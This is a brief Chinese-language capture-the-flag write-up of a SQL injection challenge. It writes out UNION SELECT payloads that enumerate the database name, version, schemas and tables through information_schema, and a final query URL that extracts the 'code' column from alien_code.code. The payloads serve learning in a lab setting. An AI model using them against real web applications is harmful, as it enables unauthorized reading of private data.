这里还是很简单的
啥也没有
然后抓包看看
发现传递参数 直接尝试sql
然后如果正确就会返回值 否则 返回1
chryse_planitia union select database(),version()
发现回显 直接开始注入
chryse_planitia union select database(),version()
chryse_planitia union select database(),group_concat(table_name) from information_schema.tables where table_schema="aliens"
太多了 不切实际一个一个查 看看有没有其他数据库
chryse_planitia union select database(),group_concat(schema_name) from information_schema.schemata
然后就是正常的注入
最后查值的时候
from alien_code.code 即可
/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code